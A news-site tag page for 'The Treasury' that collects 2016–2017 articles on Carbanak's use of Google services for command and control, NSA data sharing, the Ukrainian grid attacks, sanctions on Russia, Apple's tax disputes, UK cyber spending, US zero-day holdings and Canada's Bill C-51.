3.1 C
London
Saturday, November 18, 2017
Home Tags The Treasury

Tag: The Treasury

Carbanak certainly has not sat idly by after years of advanced criminal campaigns targeting primarily financial institutions.

The outfit, alleged to have stolen from more than 100 banks worldwide, has popped up again with a new means of managing command and control over its malware and implants. Researchers at Forcepoint said Tuesday that an investigation into an active exploit sent in phishing messages as a RTF attachment led them to discover the group has been using hosted Google services for command and control. Services such as Google Forms and Google Sheets are being co-opted by the group, allowing Carbanak traffic to essentially hide in plain sight among Google traffic that is unlikely to be blocked by an organization. Forcepoint said that each time a victim is infected by the group’s malware, a Google Sheets spreadsheet is created along with a unique ID for the victim, which is used to manage interactions with the infected machine.

The attacker then manually goes into the spreadsheet, collects any data sent back from the target’s computer and loads the spreadsheet with commands and additional malware that is pulled to the compromised machine. Forcepoint said it was not aware of how many of these command and control channels were open on Google services, but said it is something that was privately disclosed to Google.

A request for comment from Google was not returned in time for publication. “The Carbanak actors continue to look for stealth techniques to evade detection,” Forcepoint said in its report published yesterday. “Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation.” Researchers said their investigation was prompted in part by a new campaign disclosed by tr1adx, a scarcely populated website that has published four pieces of “intelligence,” primarily focusing on state-sponsored groups. On Jan. 1, it published a piece on a Carbanak campaign it was calling Digital Plagiarist.

The main tactic exposed in the report was the group’s use of tainted Office documents hosted on sites mirroring legitimate sites such as the U.S.

Food and Drug Administration, Department of the Treasury, Zyna, Atlantis Bahamas, Waldorf Astoria and many others across sectors such as manufacturing, hospitality, media and health care.

The group, which tr1adx calls the TelePort Crew, is likely Carbanak based on domains and malware used in this campaign that are similar to another disclosed by researchers at Trustwave last year. Forcepoint took a look at a RTF file previously used exclusively by Carbanak that includes crafted VBscript.

The document, Forcepoint said, contains an embedded OLE object disguised as an image asking the victim to click on it to view the attachment.

The image is hosting the VBscript, and if the victim clicks on the image, a dialogue box appears instructing the users to open the file, which executes the attack. “We decoded the script and found hallmarks typical of the Carbanak group’s VBScript malware, however we also found the addition of a new ‘ggldr’ script module,” Forcepoint said. “The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel.” Carbanak’s activities were exposed in 2015 by researchers at Kaspersky Lab who published an extensive report explaining was using advanced malware to attack more than 100 banks, stealing anywhere from $2.5 million to $10 million per bank, putting potential losses at $1 billion. Carbanak used spear phishing to infiltrate banks, laterally moving across compromised bank networks until they landed on the right system that allowed them to steal money. On some instances, Kaspersky Lab said, Carbanak would record video of system operators, which were used in concert with data obtained by implanted keyloggers to fully understand what the victim was doing on the infected machine. Kaspersky Lab said Carbanak would cash out in a number of ways: “ATMs were instructed remotely to dispense cash without any interaction with the ATM itself, with the cash then collected by mules; the SWIFT network was used to transfer money out of the organization and into criminals’ accounts; and databases with account information were altered so that fake accounts could be created with a relatively high balance, with mule services being used to collect the money.”
Gee, what a lovely parting gift by outgoing US prez A last-minute rule change signed off by the outgoing Obama administration has made it much easier for the NSA to share raw surveillance data with more than a dozen government agencies. The changes [PDF] are tacked onto executive order 12333, which was enacted by then-President Ronald Reagan to allow intelligence agencies to share information on non-US nationals.

The new rules will allow the NSA to share unfiltered signals intelligence with other members of the intelligence community if it is deemed necessary. "The procedures permit IC [intelligence community] elements to have access, under appropriate conditions, to the unevaluated or unminimized (ie, 'raw') signals intelligence (SIGINT) information that the NSA collects pursuant to EO 12333, thus enabling elements to bring their own analytic expertise to reviewing that information and to use that information in support of their own missions," the office of the Director of National Intelligence explained today. "The procedures therefore provide an important mechanism for enhancing information sharing, integration, and collaboration in the IC." Under the terms of the changes – which were signed off by outgoing US spymaster James Clapper and the Attorney General Loretta Lynch – the NSA can now pass on information to the other 15 organizations that make up the US intelligence community.

Those 15 members are: Air Force Intelligence, Army Intelligence, the CIA, Coast Guard Intelligence, the Defense Intelligence Agency, the Department of Energy, the Department of Homeland Security, the Department of State, the Department of the Treasury, the Drug Enforcement Administration (DEA), the FBI, Marine Corps Intelligence, the National Geospatial-Intelligence Agency, the National Reconnaissance Office, and Navy Intelligence. The collected information itself can include any data slurped on a foreign national, including files, phone calls, satellite messages and faxes.
It applies to communications that take place outside the US and any traffic that passes within US borders. To get their paws on this data, an intelligence organization will have to assert that it's needed for an overseas investigation, and have that request approved by a "high-level NSA official," according to a fact sheet prepared by government officials.

The requestor also has to commit to protecting the data as much as possible. US citizens can have their data surveilled in the same way on the authorization of the Attorney General, the Director of the NSA, or the head of the recipient intelligence body – or a high-level designee. The amendment also requires Uncle Sam's snoopers to undergo training on how to follow the new rules, and creates an audit trail for the information. Quite why this needed to be rushed through in the dying days of the Obama administration remains to be seen. ® Sponsored: Flash enters the mainstream.
Visit The Register's storage hub
Phishing, denial of service, and remote exploitation part of hacking banquet Hackers of unknown origin cut power supplies in Ukraine for a second time in 12 months as part of wide-ranging attacks that hit the country in December. The attacks were revealed at the S4x17 conference in Miami in which Honeywell security researcher Marina Krotofil offered reporters some detail into the exploitation that began 16 December and raged for four days. She told Dark Reading attackers triggered an hour-long power black out at midnight 17 December by infecting the Pivnichna remote power transmission facility, knocking out remote terminal units and the connected circuit breakers. Further attacks against the State Administration of Railway Transport left Ukrainians unable to purchase rail tickets and delayed payments when the Treasury and Pension Fund was compromised. It was the second network-centric attack to knock out power supply in Ukraine.

Attackers of suspected Russian origin targeted facilities in December 2015. Those 23 December outages affected Ukraine's Prykarpattya Oblenergo and Kyivoblenergo utilities cutting power to some 80,000 customers for six hours. Last month's attacks also used the BlackEnergy and KillDisk malware. Other hacks included highly-convincing and successful phishing attacks against an unnamed Ukrainian bank, various remote exploitation, and denial of service attacks. @Marmusha talks about the recent cyber-attack in Ukraine #S4x17 pic.twitter.com/wg6IUqn3Lz — Parnian (@Parnian_7) January 10, 2017 The phishing attack on 14 July last year used the ancient trick of malicious Word document macros but wrapped it in high levels of obfuscation and anti-forensics. Information Systems Security Partners head of research Oleksii Yasynskyi, who worked on dissecting the hacks, reckoned the attackers were a mix of groups specialising in different aspects of offensive security, from infrastructure to obfuscation and payload delivery. Phishing emails numbered in the thousands. Hackers kept quiet observation for months whenever one payload was successful at breaching one of the Ukrainan assets, Krotofil told MotherBoard Yet the attackers' origin was not disclosed, if it is known; Kiev laid blame squarely on Russia for the similar 2015 utility hacking. Krotofil told Dark Reading the Ukraine's utilities may be seen as a test bed for attacks elsewhere, something she says is common with Russian hackers. Alex Mathews, security evangelist lead with Russian SCADA and industrial control system outfit Positive Technologies told El Reg says vulnerabilities in critical infrastructure are easy to find and difficult to get fixed. “It takes just two days to find a new SCADA flaw, yet almost a year to get it fixed," Mathews says. "The vulnerability of our critical infrastructure is evident. "Those charged with protecting industrial control system and SCADA networks must acknowledge that they’re exposed to cyber threats and take steps to reduce the risk." ® Bootnote While concerns the attacks are a test bed for further control system hacking in other countries, compromising such infrastructure cannot be done by cookie cutter hackers. Control systems are highly specialised with proprietary and often undocumented protocols that are not ordinarily understood outside of specialist fields. Using Ukraine as a means to hack US energy companies for example is further troubled by the variance in security controls that may exist in front of and around control systems. ® Sponsored: Flash enters the mainstream.
Visit The Register's storage hub
Russian Embassy responds with pic of 'LAME' duck, says move is 'Cold War deja vu' President Barack Obama has ordered the expulsion of 35 suspected Russian spies in response to "malicious cyber activity and harassment" by Putin's government for attempts to undermine the 2016 election. In a statement issued on Thursday, Obama ordered a number of actions in response to "the Russian government’s aggressive harassment of US officials and cyber operations aimed at the US election." Under an executive order, the Obama administration has provided additional authority for responding to the cyber threats. It has sanctioned nine entities and individuals: including the GRU and the FSB, two Russian intelligence services; four individual officers of the GRU; and three companies that provided material support to the GRU’s cyber operations. He said the decision was a "necessary and appropriate response" to efforts to harm US interests in violation of established international norms of behavior. In addition, the Secretary of the Treasury is designating two Russian individuals for using cyber-enabled means to cause misappropriation of funds and personal identifying information. The State Department is also shutting down two Russian compounds, in Maryland and New York, used by Russian personnel for intelligence-related purposes, and is declaring “persona non grata” 35 Russian intelligence operatives. Obama said the Department of Homeland Security and the Federal Bureau of Investigation are also releasing declassified technical information on Russian civilian and military intelligence service cyber activity "to help network defenders in the United States and abroad identify, detect, and disrupt Russia’s global campaign of malicious cyber activities." In a statement he said: "All Americans should be alarmed by Russia’s actions." Incoming president Donald Trump, responded in a statement that it is time to “move on to bigger and better things.” He added: "Nevertheless, in the interest of our country and its great people, I will meet with leaders of the intelligence community next week in order to be updated about the facts of this situation." The Russian Embassy in London responded with a tweet of a picture of duck with the word LAME written across the bottom. "President Obama expels 35 🇷🇺 diplomats in Cold War deja vu. As everybody, incl 🇺🇸 people, will be glad to see the last of this hapless Adm," it Tweeted. In October, the Obama administration found that Russia took actions intended to interfere with the US election process. "These data theft and disclosure activities could only have been directed by the highest levels of the Russian government," said Obama. Obama said the actions are not the sum total of its response to Russia’s aggressive activities. "We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicised. "In addition to holding Russia accountable for what it has done, the United States and friends and allies around the world must work together to oppose Russia’s efforts to undermine established international norms of behavior, and interfere with democratic governance. "To that end, my Administration will be providing a report to Congress in the coming days about Russia’s efforts to interfere in our election, as well as malicious cyber activity related to our election cycle in previous elections." ® Sponsored: Flash enters the mainstream. Visit The Register's storage hub
Enlarge / Obama just left Donald Trump a nice little inauguration present—a fresh pack of sanctions against Russia and evidence of Russian interference in the presidential election.Win McNamee/Getty Images reader comments 44 Share this story In an executive order issued today, President Barack Obama used his emergency powers to impose sanctions on a number of Russian military and intelligence officials and also to eject 35 Russians labeled by the administration as intelligence operatives. The order was issued as a response to the breach of the Democratic National Committee's network and the targeted intrusion into e-mail accounts belonging to members of Hillary Clinton's presidential campaign. Obama made the sanctions an extension of an April 2015 executive order "to take additional steps to deal with the national emergency with respect to significant malicious cyber-enabled activities." The order is being accompanied by the publication of data from US intelligence communities bolstering findings that the breaches were part of an information operation to manipulate the results of the US presidential election. The data, released by the Department of Homeland Security and Federal Bureau of Investigation as a Joint Analysis Report (JAR), contains "declassified technical information on Russian civilian and military intelligence services’ malicious cyber activity, to better help network defenders in the United States and abroad identify, detect, and disrupt Russia’s global campaign of malicious cyber activities," according to an Obama administration statement. "The JAR includes information on computers around the world that Russian intelligence services have co-opted without the knowledge of their owners in order to conduct their malicious activity in a way that makes it difficult to trace back to Russia." Some of the data had been previously published by cyber-security firms, but in some cases the data is newly declassified government data. The JAR (full text available here) includes information that will allow security firms and companies to identify and block malware used by Russian intelligence services, along with a breakdown of the Russian malware operators' standard methods and tactics. DHS has added these "indicators of compromise" to their Automated Indicator Sharing service. The executive order singles out the GRU (Russia's Main Intelligence Directorate), the FSB (Federal Security Service, the successor to the KGB), Esage Lab (a Web development arm of the Russian information security company Zorsecurity), the St. Petersburg-based firm Special Technology Center, and Russia's Professional Association of Designers of Data Processing Systems. It also names four individuals: GRU chief General-Lieutenant Igor Korobov, GRU Deputy Chief and Head of Signals Intelligence Sergey Aleksandrovich Gizunov, and GRU First Deputy Chiefs Igor Olegovich Kostyukov and Vladimir Stepanovich Alexseyev. The 35 Russians ejected from the US—individuals identified as intelligence operatives working out of the Russian embassy in Washington and Russia's consulate in San Francisco—were ejected not in response to the DNC and Clinton campaign hacks, but in response to "harassment of our diplomatic personnel in Russia by security personnel and police," according to a White House fact sheet issued on the executive order. In addition to those explicitly named by the order, Obama's order applies to: …any person determined by the Secretary of the Treasury, in consultation with the Attorney General and the Secretary of State, to be responsible for or complicit in, or to have engaged in, directly or indirectly, cyberenabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States that are reasonably likely to result in, or have materially contributed to, a significant threat to the national security, foreign policy, or economic health or financial stability of the United States and that have the purpose or effect of … tampering with, altering, or causing a misappropriation of information with the purpose or effect of interfering with or undermining election processes or institutions. That could, if pressed aggressively, apply to a very large swath of individuals, including operators of "fake news" sites and others involved tangentially in the distribution of information that may be seen as intended to interfere with elections—including the still-unidentified individuals involved in hacking two state election commission websites. But many of the organizations in Russia that might fall under this banner are already under US sanctions. Just how aggressively these measures will be pressed will be left largely to the incoming Trump administration. President-elect Trump will find himself in a position of having to outright dismiss the evidence presented by the FBI and DHS in order to rescind the sanctions entirely. But Trump has already shrugged off "the cyber" on several occasions during the transition. On December 28, Trump responded to a question about possible sanctions over the hacking: I think we ought to get on with our lives. I think that computers have complicated lives very greatly. The whole age of computer has made it where nobody knows exactly what is going on. We have speed, we have a lot of other things, but I’m not sure we have the kind, the security we need.
Enlarge / The United States Treasury Department (pictured) sells bonds to investors and corporations.

Bloomberg reported that Apple holds $41.7B in US Treasury bonds, the single largest corporate holder.Eric Gilliland reader comments 94 Share this story Apple has received at least $6 per American taxpayer over the last five years in the form of interest payments on billions' worth of United States Treasury bonds, according to a Wednesday report by Bloomberg. Citing Apple’s regulatory filings and unnamed sources, the business publication found “the Treasury Department paid Apple at least $600 million and possibly much more over the past five years in the form of interest.” By taking advantage of a provision in the American tax code, Bloomberg says that Apple has “stashed much of its foreign earnings—tax-free—right here in the US, in part by purchasing government bonds.” As The Wall Street Journal reported in September, American companies are believed to be holding approximately $2 trillion in cash overseas that is shielded from US taxes. Under American law, companies must pay a 35-percent corporate tax rate on global profits when that money is brought home—so there is an incentive to keep as much of that money overseas as possible. Ars reported previously that Apple pays an effective 2.3 percent tax rate on overseas profits by using various legal tax shenanigans across several countries as a way to minimize its tax burden.

Google, Microsoft, and many other large multinational corporations engage in similar behavior. (Ars has also detailed how such arrangements typically work.) Earlier this year, the Department of Treasury announced that the White House would like to "impose a one-time transition toll charge of 14 percent on untaxed foreign earnings that US companies have accumulated overseas.

The earnings subject to the one-time tax could then be repatriated without any further US tax." (During the presidential campaign, Donald Trump said he would like to see a tax holiday of 10 percent.) Omri Marian, a tax law professor at the University of California, Irvine told Ars that this strange bond arrangement had been around for decades. “Basically the US government is borrowing the offshore money, on which no tax was paid to the US (theoretically at 35 percent),” he e-mailed. “So the US government is ending up paying interest on borrowing money in which it theoretically has a 35 percent ownership interest. On the other hand, you could argue that if not for the exception [multinational corporations] would be discouraged from purchasing US debt, or at least disadvantaged in purchasing the debt compared to foreign MNCs who do not necessarily have to pay tax on foreign profits.” Another tax law professor, Samuel Brunson, of Loyola University-Chicago, largely concurred, noting that the US government seems to be making the best of a questionable, albeit legal, situation. “What to think of this probably depends on how much you think Apple is cheating by keeping money offshore,” he e-mailed. “If they're cheating—if their actions are unfair—it stands to reason that getting an investment return from the government is also unfair.
If it's not cheating, though, that it can effectively repatriate some of its money without paying taxes (through carefully-defined investments that the government has approved) isn't necessarily a bad thing.”
EnlargeDefence Images reader comments 8 Share this story The UK government has promised to spend nearly £2 billion over the next five years to try to tackle the growing problem of cyber attacks in the country. Recent research suggested that Britain is particularly susceptible to data breaches involving compromised employee account data. Nonetheless, chancellor of the exchequer Philip Hammond claimed on Tuesday that the country is "an acknowledged global leader in cyber security." Number 11's occupant crowed that the previous Tory-led coalition government had chucked £860 million at the problem, but Hammond then undermined himself somewhat by adding that "we must now keep up with the scale and pace of the threats we face." Which underlines the fact that the government is playing catch-up in its race against cybercrims. The answer, according to the treasury, is to up taxpayer-funded spending in the fight against cyber attacks.

The chancellor said: Our new strategy, underpinned by £1.9 billion of support over five years and excellent partnerships with industry and academia, will allow us to take even greater steps to defend ourselves in cyberspace and to strike back when we are attacked. If your toes aren't already curled enough, perhaps paymaster general Ben Gummer can help. He said: "No longer the stuff of spy thrillers and action movies, cyber-attacks are a reality and they are happening now. Our adversaries are varied—organised criminal groups, 'hactivists,' untrained teenagers, and foreign states." Readers of these pages know that there is nothing new about baddies misbehaving on the Web.

But since the TalkTalk hack attack in October 2015, such crimes have finally gone mainstream. The treasury added that Whitehall's hefty investment would be three-pronged.
It said a "world-class cyber workforce" would be developed, added that the UK would "use automated defences to safeguard citizens and businesses against growing cyber threats," and said that deterrent plans would be put in place propped up by better policing capabilities. Number 11 said it would work closely with industry partners such as Bath-based Netcraft—an outfit that specialises in Internet security services and counts clients that include Microsoft, BT, Cisco, and Intel. Hammond is also expected to announce plans to invest in the next generation of infosec experts with a new Cyber Security Research Institute, which we're told is a "virtual collection of UK universities" that will be tasked with beefing up smart phone, tablet, and laptop security "through research that could one day make passwords obsolete." The GCHQ-backed National Cyber Security Centre opened its doors for the first time last month.

By early 2017, the government has promised that the cyberhub will have a 700-strong team running the show. However, the government's so-called National Cyber Security Strategy isn't entirely welcomed by industry.
ISPs recently expressed concern about regulatory meddling, arguing that the focus should be on raising awareness, rather than burdening telcos with yet more rules. As part of its cyber defence plan, Hammond's department said that the industry would be expected to adopt "a range of technical measures" including DNS filtering against malware and phishing sites, an e-mail verification system on government networks to try to prevent domain spoofing, and researching methods to move "safely beyond passwords." It hopes to also bring in a scheme to detect government network attacks. The chancellor claimed that the government had already improved its efforts against "a website serving Web-inject malware." We're told that it previously "would stay active for over a month—now it is less than two days. UK-based phishing sites would remain active for a day—now it is less than an hour.

And phishing sites impersonating government’s own departments would have stayed active for two days—now it is less than five hours." NHS trusts have, for years, been particularly susceptible to such attacks.
Indeed, the Northern Lincolnshire & Goole NHS Foundation Trust remains on red alert with appointments cancelled as it battles a virus that blighted its IT systems on Sunday. This post originated on Ars Technica UK
EnlargeChris Foresman reader comments 177 Share this story BRUSSELS—A war of words has erupted between Europe’s competition chief and Apple CEO Tim Cook after Ireland was ordered to reclaim €13 billion (£11.1 billion/$14.5 billion) in back taxes from the company. Cook, in an interview with the Irish Independent, labelled Brussels' competition chief Margrethe Vestager’s decision as “total political crap.” He claimed Ireland was being "picked on" and that he hoped to see the Irish government launch an appeal against the ruling. On Tuesday, Vestager said that the European Commission’s two-year investigation had found Apple guilty of receiving illegal state aid from Ireland thanks to so-called sweetheart tax deals in 1991 and 2007.
She said that Ireland allowed Apple to pay an effective corporate tax rate of one percent on its European profits in 2003, down to as low as 0.005 percent in certain years. Apple, in a statement on Wednesday, said that the "number quoted by the European Commission is extremely misleading and deceptive." It added: We paid $400 million in taxes in Ireland in 2014—considerably more than the commission’s figure suggests. We were certainly one of the largest corporate taxpayers in Ireland that year, if not the largest. In addition, we paid $400 million of current US taxes on those profits, bringing total current taxes paid to $800 million. Most importantly, the commission completely ignores the fact that the vast majority of those profits was subject to US taxation.

Apple also accrued several billion dollars in US deferred taxes on those profits earned in 2014. Vestager refuted that claim when quizzed by reporters on Thursday. "This is a decision based on the facts of the case.

The figures that we used in our decision are the figures that we got from Apple themselves," she said. "There are very, very few figures in the public domain. More transparency would be a good thing, for example, a country by country reporting.
If it was up to me, the non-confidential version of the decision would have been published yesterday, because that is another way of enabling everyone to see what we have decided and on what basis we have made this decision. Right now the ball is in the hands of Apple and Ireland." She also rejected Cook’s claim that her decision was politically motivated.
Vestager said: "The enforcement part of the competition portfolio does not really fit into any political picture.

Even if it weren’t like this, we always have the courts to keep us in line.

Because I don’t think the courts will hear any political opinions or feelings, they want the facts of the case and that is what we have to produce." Apple has said it plans to appeal against the decision. However, despite previously insisting that Ireland's government would similarly challenge the commission's ruling in the courts, an agreement to do so wasn't made by the Irish cabinet during a special meeting convened on Wednesday. Enlarge / Brussels' competition chief Margrethe Vestager. Johannes Jansson The US has also weighed in on the case. Last week the treasury department warned that it would "consider its options." On Wednesday, treasury secretary Jack Lew said that he was concerned that the case was an attempt to reach into income that ought to be taxed in the US. Ars asked Vestager to respond to Lew's claims about the distribution of Apple's coffers. The commissioner said: "The Apple case is about profits made by sale in Europe so obviously it is a question of tax being paid in Europe.
It is a European matter and a matter for state aid rules." She added that she was looking forward to meeting Lew in person in Washington later this month. Meanwhile, Brussels' competition officials continue to investigate a similar case about Amazon's tax arrangements in the European Union. This post originated on Ars Technica UK
EnlargeSnow White, Disney Films reader comments 47 Share this story Apple's battle with the European Union’s competition watchdog has been backed by the US government, which on Wednesday waded into the complaint over the iPhone maker's tax arrangements. The US treasury warned in a white paper that Brussels' ongoing investigation into Apple’s tax deal with Ireland could “create an unfortunate international tax policy precedent.” On Thursday, the European Commission responded that there was “no bias” against US companies. After two years of investigations, antitrust chief Margrethe Vestager is expected to issue a decision on allegations of tax dodging by Apple in the autumn. The commission is considering whether the company used so-called “transfer pricing arrangements” to move profits around in order to avoid tax.
Ireland is implicated in letting Apple pay a tiny amount of tax.

Technically, this means that it may have benefited from illegal state aid. “Tax rulings may involve state aid within the meaning of EU rules if they are used to provide selective advantages to a specific company or group of companies,” the commission states. But the US treasury warned that Vestager's office was in danger of overstepping its bounds “beyond enforcement of competition and state aid law under the TFEU [Treaty on the Functioning of the EU] into that of a supra-national tax authority.” It said it was considering “potential responses should the commission continue its present course,” adding: “a strongly preferred and mutually beneficial outcome would be a return to the system and practice of international tax cooperation that has long fostered cross-border investment between the United States and EU member states.” Vestager has already ordered the payment of more than €20 million in back taxes from Starbucks and Fiat Chrysler over similar tax deals with the Netherlands and Luxembourg, and Ireland could be instructed to reclaim up to tens of billions of dollars from Apple. The US government's bean counters are worried about the crackdown, however: There is the possibility that any repayments ordered by the commission will be considered foreign income taxes that are creditable against US taxes owed by the companies in the United States.
If so, the companies’ US tax liability would be reduced. To the extent that such foreign taxes are imposed on income that should not have been attributable to the relevant member state, that outcome is deeply troubling, as it would effectively constitute a transfer of revenue to the EU from the US government and its taxpayers. Put another way, the US treasury appears to be saying: "we get to tax our multinationals, not the EU." Apple CEO Tim Cook has always denied any wrongdoing. The commission has also been pursuing a similar investigation against Amazon in Luxembourg and has warned that other cases may be on the way. “A substantial number of additional cases against US companies may lead to a growing chilling effect on US-EU cross-border investment,” the treasury hit back. On Thursday, the commission's spokesperson, Alexander Winterstein, said that it had taken note of the white paper, before drily saying that EU state aid rules have been in place for years. “With regard to the insinuation of bias, let me repeat what commissioner Vestager has been saying, which is that EU law and competition rules apply indiscriminately to all companies operating in Europe, whether they are big companies or small companies, whether they are companies that are European or companies from outside Europe.

There is absolutely no trace of a bias here,” he added. This post originated on Ars Technica UK
Thanks, Obama DEF CON While some fear the US government is hoarding a vast pool of zero-day security vulnerabilities, the reality is that it probably holds just a few dozen, according to a study by Columbia University. In a presentation at the DEF CON hacking conference in Las Vegas today, Jason Healey, senior research scholar in the university's faculty of international and public affairs, detailed his students' attempts to ascertain the number of critical bugs stockpiled in secret by the US. By keeping details of software vulnerabilities under lock and key, developers aren't made aware that they need to patch their code, allowing government agents to exploit the holes to attack targets. One problem with that is private hackers can also find the bugs and exploit them for fun and profit. Healey said he expected the amassed bugs to number in the thousands, but research suggests that it's likely to be fewer than 50 in all. Healey was a founding member of the Joint Task Force–Computer Network Defense, the world's first joint cyber warfare unit, and has tabs on what is going on inside Washington DC. He acknowledged that we'll never know the true number of vulnerabilities, however released documents, Snowden leaks, interviews with intelligence staff, and presidential papers suggest the number of stored flaws is much lower than people think. The use of computer vulnerabilities has split government departments, which is an advantage for researchers and both sides brief against each other. On one side, you have the Department of Defense and the intelligence community, which would like to hoard secret zero-days for spying and online war purposes. On the other side, the Department of Commerce, the Treasury, and the Department of Homeland Security want them fixed as soon as possible. It's documented that the US has been using zero days since the early 1990s, Healey said. In the middle of that decade, the NSA opened its Information Operations Technology Center to manage its store of vulnerabilities and exploits. This was run under the Information Assurance Directorate (IAD) – which handles cyber defense – rather than the Tailored Access Operations (TAO) unit – which hacks opponents. Healey said this was an encouraging sign. In 2002, National Security Presidential Directive 16 was issued, outlining guidelines for cyberwarfare. The unredacted sections of this still-classified directive make it clear that each intelligence agency's director is responsible for managing their stock of zero-day flaws and deciding whether or not to inform the manufacturer and get them fixed. However, this was never codified into formal instructions to government departments. Heeeeeeeere's... Barry That changed with the Obama administration. In the wake of the Edward Snowden leaks, the White House set a policy that vulnerabilities were to be disclosed to manufacturers by default. If government departments wanted to keep them quiet, they had to make their case to the executive branch. There was a move to make exceptions for national security issues and law enforcement, which Healey opined would have given the FBI and NSA carte blanche to ignore the rules. However, the discovery of the Heartbleed flaw seems to have stopped that. The NSA was forced to deny that it had prior knowledge of the exploitable programming blunder, a level of openness that Healey said "floored" him. Documents obtained by the Electronic Frontier Foundation show that the NSA reported 91 per cent of its vulnerabilities to manufacturers after the presidential ruling. However, they only cover the NSA – who knows what the CIA and other agencies are holding, he said. There are also ways around the new rules, Healey said. Based on interviews, it seems the FBI's method for hacking into the iPhone wouldn't be covered under the rules, since technically the Feds only purchased a tool to crack the smartphone, not the knowledge of how it was actually done. We do know that in 2013, the NSA had a budget of $23.1m to purchase and manage computer vulnerabilities. Healey said that, given the going rate for such cracks, that would indicate the agency could afford about 75 critical zero days – but that figure could be larger. Given that a large proportion of these would be disclosed, and many others would be independently discovered by researchers, that suggested the NSA was only holding a few dozen zero days. This was confirmed when Snowden, or persons unknown, leaked the TAO hacking catalogue, which listed 50 software flaws that it had on its books. Healey said he had checked his figures with both the former head of the NSA, Michael Hayden, and the former head of the IAD, Dickie George. Both had confirmed that his figures looked accurate, with George saying the NSA only retained three or four a year. Healey acknowledged that we'd probably never know the true number of zero days hoarded by all government agencies. Research shows it's probably not as many as people think. He also pointed out that other countries will also be harvesting these flaws, and ascertaining the number of those was even harder than doing so for the US government agencies. ® Sponsored: 2016 Cyberthreat defense report
Edward Snowden headlines SecTor security conference as Canadian privacy advocates await the Trudeau government's next move in the country's complex privacy and security debate. Edward Snowden’s 2013 revelations of massive state surveillance shocked the world and made it more aware of electronic privacy issues, but north of the border, Canada continues to struggle with its own. Just over a year ago, the former Conservative Canadian government, led by Stephen Harper, enacted a piece of legislation that enraged privacy advocates.

Bill C-51 extended the powers of Canada’s intelligence services, prompting an open letter from over 100 Canadian academics imploring the government to rethink it.

Even the federal Privacy Commissioner complained about it. A year later, we have a new government that has promised to overhaul things. What has been done, and where does Canada’s complex debate over privacy and national security sit now? C-51 angered privacy advocates by increasing information-sharing powers between 17 government agencies.

The Canadian Security Intelligence Service (CSIS), which is Canada’s domestic intelligence agency, can now obtain the tax records of anyone perceived to be a national security threat, for example.

The bill also permitted the disclosure of information shared between government agencies to others. C-51 gave new powers to CSIS.

They included the "disruption" mandate, which lets it take measures to reduce threats when it believes they pose a threat to the security of Canada. Legal experts have questioned the wording here, worrying that CSIS gets to determine what constitutes a threat and suggesting that it can legitimize a slew of activities including electronic surveillance without the need for the agency to ask for a warrant. All of this dismayed Snowden, who has specifically referenced Canada when warning against passing anti-terror laws that curtail civil liberties. Edward Snowden will be speaking via video link at the SecTor security conference in Toronto at 9 am on Tuesday October 18, and will be taking questions from Dark Reading readers. If you have relevant questions you would like to ask, let the SecTor team know by posting them in the comments section at the bottom of this article.
SecTor will be selecting the best to be addressed at the event.
Politically, the Conservative Harper government naturally supported the bill, having introduced it in the first place, while the left-leaning National Democratic Party (NDP) strongly opposed it.

The moderate Liberal party, which ended up winning last year’s federal election, came down in the middle, supporting the bill but with some caveats. Trudeau: Broader oversight, narrower scopeLiberal leader and now-Prime Minister Justin Trudeau voted for the bill but vowed to temper it a little in two broad areas. The first focal point was oversight.

The Liberal government would create a multi-party oversight committee to ensure that CSIS was acting appropriately.
Snowden himself criticized Canada for poor spying oversight back in May 2015, not long before the Bill became law. CSIS hasn’t been entirely without oversight in the past.

Traditionally, the body responsible for overseeing CSIS has been the Security Intelligence Review Committee (SIRC).

This body typically reviewed a sample of CSIS warrant applications, but in its annual report for 2014-15, it explained that it would have to broaden its review activities to cope with the new powers granted to CSIS under C-51.

The Harper Government had already earmarked additional funding to help with this in its 2015 Economic Action Plan. SIRC explained that it had broadened its scope to cover CSIS’ use of metadata, and had found it wanting in areas including training, policy and procedure, investigative thresholds, and recording its decision-making.
SIRC had made some key recommendations in this area that CSIS had not taken up, the report said. The Trudeau’s concern was that SIRC described itself as a review body, examining past activities, rather than an oversight body, monitoring CSIS operations in real-time. The Liberal leader vowed to alter this and started to make good on this promise in early 2016. His public safety minister Ralph Goodale has now introduced Bill C-22, which would create a cross-party oversight committee that would oversee almost 20 agencies related to national security. Mandatory review periodThe second problem that Trudeau had with C-51 was with the bill’s scope. He promised to refine some of its language to omit legal protests and advocacy from definition as terrorist activities, and said that he would introduce a mandatory review period for the legislation. He hasn’t taken these steps at the time of writing, and privacy advocates are awaiting the government’s next move.
In the interim, Trudeau has been shuffling. One notable political action was his appointment of a new national security advisor, Daniel Jean, in May this year. Jean replaces former Harper government National Security Advisor Richard Fadden, an ex-director of CSIS, who recently retired. Jean doesn’t come from the spy community, moving up instead from his role as deputy minister of foreign affairs.

Before that, he served in Heritage Canada and the Treasury Board.

That may point to a more international intelligence focus at the top and a move away from more hardline domestic intelligence policies.
It could be taken as an indicator that the Trudeau government intends to calibrate Bill C-51 to bring it more in line with its new focus. All this will still be guesswork until Trudeau actually takes steps to change the legislation.

An attempt at proper oversight may appease privacy advocates a little, but we still don’t know what will happen to the government’s electronic surveillance powers until a minister stands up in parliament with a proposed amendment. Even when that happens, it’s unlikely to satisfy privacy advocates who have always called for the repeal of C-51, but they’re unlikely to get much more.

After all, the Trudeau government never promised to do away with the thing altogether. Don’t forget, Edward Snowden will be speaking via video link at the SecTor security conference on October 18, so post your questions in the comments section below. Related Content: Bruce Cowper is a founding member of the Security Education Conference Toronto (SecTor), the Toronto Area Security Klatch (TASK), the Ottawa Area Security Klatch (OASK) and an active member of numerous organizations across North America.
In his day job, Bruce works for ...
View Full Bio More Insights